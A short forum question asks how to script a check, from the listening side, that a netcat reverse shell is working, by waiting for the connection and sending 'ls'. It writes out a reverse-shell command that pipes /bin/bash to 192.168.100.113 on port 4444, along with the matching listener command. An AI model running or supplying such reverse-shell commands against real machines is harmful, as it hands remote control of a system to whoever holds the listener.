# Check netcat reverse shell with script

Tags: linux, shell, netcat, reverse-shell

I do reverse shell with netcat.

A side `nc 192.168.100.113 4444 –e /bin/bash`

B side `nc –lvp 4444`

I want to automated and check this process from B side with shell script that reverse shell really working.

In B side, after `nc –lvp 4444` How can I wait until I will get a connection and than send `ls` command and check the result?

Comment: wich version of OS and netcat (BSD, GNU)??